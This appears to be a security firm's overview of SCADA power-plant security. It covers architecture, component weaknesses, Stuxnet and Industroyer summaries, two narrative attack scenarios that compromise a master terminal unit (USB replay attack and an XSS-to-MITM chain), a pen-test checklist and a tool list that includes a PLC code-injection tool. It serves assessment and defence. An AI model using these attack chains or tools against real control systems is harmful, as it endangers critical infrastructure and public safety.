TYPICAL ARCHITECTURE OF SCADA POWER PLANT
The model consist of 3 major compartment or network area namely the ENTERPRISE NETWORK, the PROCESS NETWORK, and the CONTROL NETWORK.
1.Provides Services for all enterprise business operations such as Web/Email Servers, Application Servers, Workstations etc.
2.Regular access to Internet or Intranet.
3.Firewall Protected. (Tier I Security)
1.Consist of Master Terminal Unit, HMIs and the Database Historian.
2.Provides an interface where the operator administers control and supervisory actions on all other subcomponents and field devices for efficient operation of the SCADA system.
3.Firewall Protected. (Tier II Security)
1.Comprises the field instrumentation devices such as the Remote Telemetry Unit (RTU), the Sensors/IEDs and Actuators.
2.Modern SCADA incorporates an Intelligent Electronic Device (IED) which is an intelligent sensor and capable of functioning in place of the Programmable Logic Controller (PLC)
3.Secured WAN Link. (Tier III Security)
SECURITY ISSUES OF SCADA
SECURITY ISSUES WITH MTU
- Outdated Operating System, Applications and AntiVirus.
- Updating to latest versions might cause operational instability, affecting system availability.
- Attacks that could compromise MTU – SQL Injection, Buffer Overflow, Lack of Privilege separation etc.
- Physical and deliberate compromise by an insider, negligence of the operator in identifying false alarm, or in adhering to the Security Policies.
SECURITY ISSUES WITH HMI
As with the MTU the HMI are also affected with security issues resulting from outdated operating system, software and antivirus program. Some possible threats resulting from these issues are:
1.Input Validation Vulnerability: Arising as a result of improper validation of input variable causing the software to write more data than it can normally hold.
2.System Level Access: When the HMI default access level is system it could pose a security challenge as an attacker who succeeds in compromising the HMI will not face difficulty in taking control of its entire functionality to cause havoc.
SECURITY ISSUES WITH DATABASE HISTORIAN
- Usage of deprecated software and applications, lack of efficient patch management and improper application development becomes the reason of a compromised DB historian.
- Attacks that could compromise DBH – SQL Injection, Buffer Overflow, Cross-site scripting etc. allowing an attacker access to cookie-based authentication credentials to gain access to the system.
SECURITY ISSUES WITH SENSORS
- Signal jamming and interference causing signal distortion and denial of service.
- Since the sensor communicates directly with the RTU it is possible for an attacker who successfully penetrated the network to conduct a MAN-IN-THE-MIDDLE attack due to the lack of sufficient cryptographic mechanism in Modbus protocol.
- Attacks that could compromise SENSORS – MiTM, FLOODING, TAMPERING, DOS, REPLAY attack.
SECURITY ISSUES WITH RTU
RTU is notable for several security issues such as:
1.Packet Modification: RTU packet in transit can be captured and modified since the protocol used within the field devices lacks proper encryption mechanism hence the messages are in plain text.
2.Buffer Overflow: Memory allocation on field devices such as RTU are usually fixed, hence knowledgeable attackers can take advantage of this to cause a denial of service.
3.Replay Attack: RTUs can be the route to stage a replay attack. Replay attack occurs when a captured message is retransmitted at some other time.
4.Privilege Escalation: An attacker who has successfully penetrated the control network via MiTM attack can increase his access level by exploiting privilege escalation vulnerability, should the RTU in use be susceptible to such vulnerability. An attacker exploiting this vulnerability can cause confidentiality, integrity and availability issues for the concerned system.
SECURITY ISSUES WITH COMMUNICATION PROTOCOLS
The two most common protocol used in SCADA network is Modbus and DNP3. While Modbus is proprietary, Distributed Network Protocol (DNP3) is non-vendor specific. These two protocols have common security issues such as lack of Cryptography.
SCADA ATTACK VECTOR
A compliance with MITRE ATT&CK Framework and Cyber Threat Metrics
These represent the starting point or point of compromise with which an adversary use to gain initial foothold within the target’s network. With respect to this work we have identified and used six possible attack vectors to compromise the SCADA master terminal unit from the documentation of MITRE ATT&CK framework and Cyber Threat Metrics, namely: removable media, malicious web components (SQL, XSS, BOF), Drive-by Compromise and Spear Phishing Attachment.
This form of attack vector is mostly used in networks that are not easily reachable or accessible, also known as AIR-GAPPED NETWORKS e.g. SCADA and DCS network. The malware is copied into the removable media e.g. USB stick, thumb drive etc, and inserted into the target system mostly by disgruntled employee who has physical access to the system.
SPEAR PHISHING ATTACHMENT
This form of compromise involves a more targeted approach in which an adversary gains access to the target network by way of MALICIOUS EMAIL ATTACHMENT. It is a form of social engineering technique that uses a well constructed target-specific email to deliver the malware.
This method of malware infection takes advantage of a USER VISITING A WEBSITE in the process of browsing. This form of exploitation is mostly effective as once successful it gives the adversary access to the internal network systems. An adversary delivers the exploit code by injecting malicious code on a rather legitimate website. Cross-site scripting and watering hole attack are methods used. Other ways are through malicious adware and spywares served through legitimate websites.
MALICIOUS WEB COMPONENT (SQL INJECTION, BUFFER OVERFLOW & XSS ATTACKS)
This can be a tool for an attack to be propagated by using web pages that has been compromised with malware. An individual visiting such COMPROMISED WEBPAGE can also possibly expose his system or network to such vulnerability and in the process inadvertently download the malware. SQL injection, Buffer Overflow attack and Cross-site scripting attack are possible for webpages that are not properly secured or code not properly written and tested for bugs.
SCADA ATTACK ANALYSIS – STUXNET
Stuxnet functions by targeting machines using the Microsoft Windows operating system and networks, then seeking out Siemens Step7 software. Stuxnet reportedly compromised Iranian PLCs, collecting information on industrial systems and causing the fast-spinning centrifuges to tear themselves apart.
Stuxnet has three modules: a WORM that executes all routines related to the main payload of the attack; a LINK FILE that automatically executes the propagated copies of the worm; and a ROOTKIT component responsible for hiding all malicious files and processes, to prevent detection of Stuxnet.
It is typically introduced to the target environment via an INFECTED USB FLASH DRIVE. The worm then propagates across the network, scanning for Siemens Step7 software on computers controlling a PLC. In the absence of either criterion, Stuxnet becomes dormant inside the computer. If both the conditions are fulfilled, Stuxnet introduces the infected rootkit onto the PLC and Step7 software, modifying the code and giving unexpected commands to the PLC while returning a loop of normal operation system values back to the users.
For its targets, Stuxnet contains, among other things, code for MAN-IN-THE-MIDDLE ATTACK that fakes industrial process control sensor signals so an infected system does not shut down due to detected abnormal behaviour.
SCADA ATTACK ANALYSIS – INDUSTROYER
Industroyer (also referred to as Crashoverride) is a malware framework considered to have been used in the cyberattack on UKRAINE’S POWER GRID on December 17, 2016. Industroyer is the first ever known malware specifically designed to attack electrical grids. At the same time, it is the fourth malware publicly revealed to target industrial control systems, after Stuxnet, Havex, and BlackEnergy. Industroyer can use a specialized exploit to launch a DoS attack on the Siemens SIPROTEC devices widely used in electro-energetics. By exploiting a known vulnerability (CVE-2015-5374) the malware can place the device into “firmware update” mode.
SCADA ATTACK SCENARIO
We have been able to come up with 2 different attack scenarios. The ultimate goal of our attack in each of the model is to compromise the integrity of data of a SCADA MASTER TERMINAL UNIT. The MTU as explained previously is where the ultimate control decision is made and translated in the form of a command which is transmitted over the communication link and effected on the respective field devices. The effect of an MTU integrity-based compromise is far reaching and can result in physical damage.
We define integrity-based compromise as any attempt perpetrated by an attacker to circumvent the authority of the operator of the SCADA MTU gaining full control of the component and issuing out malicious instructions, or a deceptive action by a malicious agent geared towards luring the operator of the SCADA MTU to perform and issue out wrong commands in response to a false alarm.
ATTACK SCENARIO – 1
ATTACK SCENARIO – 1
|ATTACK GOAL||Compromising MTU integrity by REPLAY ATTACK|
|ATTACK VECTOR||Removable Media|
|ATTACK AGENTS||Disgruntled Field Operative (Malicious Insider)|
|ATTACK SCOPE||Control and Process Network|
- The goal here is to compromise the integrity of the SCADA MTU by transmitting replay packets.
- The attacker is able to use the help of an insider known as a disgruntled field operative, with possession of an undetectable malware(Zero day) in USB.
- Malware is a zero day hence cannot be detected by security scanner and intrusion detection software since both security appliances do not have the signatures.
- The malware exploits authentication vulnerability of the Modbus communication protocol and as a result opens up remote communication with the attacker, enabling the attacker gather more intelligence about the system and further grant attacker remote presence within control network.
- The attacker could exploit known vulnerabilities and gain preliminary user level access to the RTU, and once it’s done he is able to elevate his privilege thus gaining administrative access to the device which would ultimately give him the opportunity to inject replay packet for onward transmission to the MTU.
- The attacker is thus able to transmit an old packet at a new time in a REPLAY ATTACK which would possibly cause the operator at the MTU to see the new malicious message as legit and in response issue the wrong control command, and by virtue of issuing the wrong command the operator would have inadvertently compromised the integrity of the SCADA MTU.
ANALYSIS OF ATTACK SCENARIO – 1
|ATTACK NODES FROM MODEL||SI SCORE|
|REMOTE ADMINISTRATION||“Malware Opens up Remote Communication”; “Inject Sensor Packet Data”; “Transmit Replay Packet”||1|
|STEALTH||“Modbus authentication vulnerability exploited leading to undetected access to control network”||1|
|ZERO – DAY VULNERABILITY||“Malware present in USB for initial compromise” and two Zero-day vulnerabilities exploited—First: to obtain shell access to remotely administer control on RTU, Second: to escalate privilege.||1|
|APT||Multiple zero-day exploits used namely: Modbus Authentication vulnerability exploit, RTU credential vulnerability exploit to obtain shell access and RTU privilege escalation vulnerability exploit.||1|
ATTACK SCENARIO – 2
ATTACK SCENARIO – 2
|ATTACK GOAL||Compromising MTU Integrity XSS Attack.|
|ATTACK VECTOR||Malicious Web Component (XSS Attack)|
|ATTACK AGENTS||Targeted-threat Agent|
|ATTACK SCOPE||SCADA Enterprise and Process Network.|
- The attacker performs initial reconnaissance to gather relevant information regarding the victim who happens to be an ignorant Enterprise Network user.
- Attacker inject payload into the victim’s web application. Since execution of exploit code in XSS attack depends on the target’s interaction with the compromised web application, the execution of the malicious code is achieved in two ways, via social engineering technique where attacker lures the ignorant Enterprise Network user to visit malicious URL, and secondly via a known exploit.
- Being in possession of the victim’s cookie the attacker can have access to enterprise user’s session consequently impersonating him. In this process, the attacker easily bypasses firewall 1 detection and gains access to the web server in the enterprise network. Once a foothold has been established within the enterprise network, the attacker can further exploit a known information disclosure vulnerability. By virtue of exploiting an information disclosure vulnerability the attacker is able to steal administrator’s session cookies credential and also obtain VPN credentials.
- With the required access level offered by administrative access rights the attacker is able to use VPN tunnelling techniques to tunnel and gain access into process network thus evading firewall 2 detection. Now attacker can stage a Man In The Middle Attack by eavesdropping on communication between components of the process network. Attacker is thus able to gain limited access to the MTU. Attacker further exploit a known privilege escalation vulnerability able to gain root access to the MTU which gives him ultimate control over the MTU and with such control he is able to modify MTU control signal compromising the integrity of the entire SCADA system.
ANALYSIS OF ATTACK SCENARIO – 2
|FEATURE TYPE||ATTACK NODES FROM MODEL||SI SCORE|
|SOCIAL ENGINEERING||“Target Visits Malicious URL”||1|
|REMOTE ADMINISTRATION||“XSS payload injected to web Application”, “Steal Session Cookies”; “Steal Administrator Credentials”; “VPN Tunneling”; “MITM Attack”||1|
|ZERO – DAY VULNERABILITY||Three Zero-day used. “Xss Vulnerability exploit”;
“Information disclosure vulnerability exploit”;
“Privilege Escalation Vulnerability exploit”
|APT||Multiple Zero-day exploits; Steal User Session;
INDUSTRIAL SOLUTION TO SCADA NETWORK DEFENSE
The overall SCADA Project approach contains 4 phases –
- DEFINE PROJECT SCOPE
- IDENTIFYING TERMS OF REFERENCE
- INFORMATION GATHERING
ON SITE WORK
- FACILITY TOUR
- NETWORK REVIEW
- NETWORK ANALYSIS
- HOST ASSESSMENT
OFF SITE WORK
- DOCUMENT COLLECTION
- VALIDATE NETWORK ARCHITECTURE
- ANALYZE ROUTER, SWITCH, FIREWALL CONFIGURATIONS, HOST CONFIGURATIONS AND SCRIPTS
- PRIORTIZE AND RANK SECURITY RISKS
- PROVIDE RECOMMENDATIONS
REVIEW WITH CLIENT
- 1ST DRAFT REPORT ON FINDINGS AND RECOMMENDATIONS
- REVIEW DRAFT WITH STAKEHOLDERS ON SUGGESSTIONS AND MODIFICATIONS
- FINAL REPORT
The SCADA Network sees it’s most of weaknesses at the Enterprise Level which is highly dependent upon human interaction. It is, however always recommended to train the human resources. Training empowers employees with an up-to-date know-how on how to recognize and mitigate a cyber-threat. By making employees able to identify and eliminate cyber threats, we are strengthening the most vulnerable link in the chain. Anonymity CSL provides comprehensive Training Programmes especially designed for SCADA Workforce to minimize the risk of Human Err.
OUR APPROACH AND METHODOLOGY
The METHODOLOGY ANONYMITY CSL takes up are distributed in 6 stages–
- Define project scope and terms of reference
- Define restrictions e.g. operating hours, tolerable downtime
- (if any) etc.
- Customization of assessment procedures
- Information gathering
- Assessment on SCADA, RTU and PLC
- Check patch level
- Check connection type and communication
- Testing of register / coils
- Conduct physical assessment
- Check on the current policy
1. PROJECT PLANNING AND INITIATION
2. DESKTOP AND SERVER SECURITY ASSESSMENT
3. SCADA SECURITY ASSESSMENT
4. NETWORK ARCHITECTURE REVIEW AND SECURITY ASSESSMENT
5. PHYSICAL ASSESSMENT
- Check desktop / server role and compare against services running
- Check patch level
- Check permission on critical directories
- Check logging / Anti Virus
- Review current network architecture design
- Conduct assessment on Network device configurations
- Network sniffing
- Analysis of Findings
- Identify Risk Rating
- Consolidate Reports
SCADA PEN TESTING CHECKLIST
- Are all factory default credentials changed?
- Is access to PLCs whitelisted to authorised machines only? They should not be reachable from everywhere.
- Is the SCADA network separated from the rest of the network? If not, try reaching the PLCs from corporate workstations.
- Is physical access to the SCADA control centre restricted?
- Can you access the internet from the controller machine?
- Are there any clear text services running on the SCADA network?
- Does the organisation follow a strict password policy?
- Are the controller machines, workstations and servers patched? Are they running anti-virus software and have application whitelisting enforced?
RECOMMENDED TOOL LIST
Here are the tools that we recommend in a SCADA assessment –
smod: ModBus penetration testing framework
plcscan: Python script for scanning PLC devices
NMAP Scripts: NMAP script to scan PLC devices
Wireshark: Network sniffer
mbtget: Perl script to read data from PLC
plcinject: Tool to inject code into PLCs